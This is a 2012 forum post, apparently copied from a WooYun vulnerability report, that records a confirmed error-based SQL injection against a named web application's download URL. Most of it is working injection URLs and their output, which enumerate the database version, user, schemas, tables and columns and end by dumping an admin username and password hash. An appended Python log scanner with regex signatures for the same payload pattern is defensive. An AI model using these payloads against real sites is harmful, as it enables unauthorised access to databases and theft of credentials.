PHP+MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find one here. This is just a test run and a record of it.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
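A defensive counterpart to the requests recorded in the post, as an added example that is not part of the original post: a Python scan of web access logs for the `count(*)` / `floor(rand(0)*2)` / `group by` combination that every one of those requests shares. The log lines are constructed (combined log format, documentation IP addresses), and all function and variable names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Building blocks of the duplicate-key error pattern in the requests above.
# The three CORE markers appearing together in one request raise an alert.
SIGNATURES = {
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by\b", re.I),
    "concat": re.compile(r"concat\s*\(", re.I),
    "info_schema": re.compile(r"information_schema\s*\.", re.I),
}
CORE = {"count_star", "rand_floor", "group_by"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines: benign, '+'-encoded, %20-encoded, benign search.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 500 312
203.0.113.9 - - [13/Sep/2012:17:41:15 +0800] "GET /download/downpage/netarea/id/1600003%27%20OR%201=(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20USER()),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%23 HTTP/1.1" 500 298
203.0.113.7 - - [13/Sep/2012:17:42:30 +0800] "GET /search?q=group+by+example HTTP/1.1" 200 890
""".splitlines()

def normalize(target, max_rounds=3):
    """Percent-decode until stable ('+' becomes a space), then collapse whitespace."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target)

def classify(target):
    """Return ('alert' | 'ok', sorted names of the signatures that matched)."""
    text = normalize(target)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    return ("alert" if CORE <= set(hits) else "ok"), hits

def scan(lines):
    """Return (line_number, hits) for every logged request classified as an alert."""
    alerts = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            verdict, hits = classify(match.group(1))
            if verdict == "alert":
                alerts.append((number, hits))
    return alerts

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: error-based SQLi pattern, matched {hits}")
```

Requiring the three core markers together keeps a request that merely contains the words "group by" from alerting. The HTTP 500 responses in the sample lines are a second signal worth correlating with these hits.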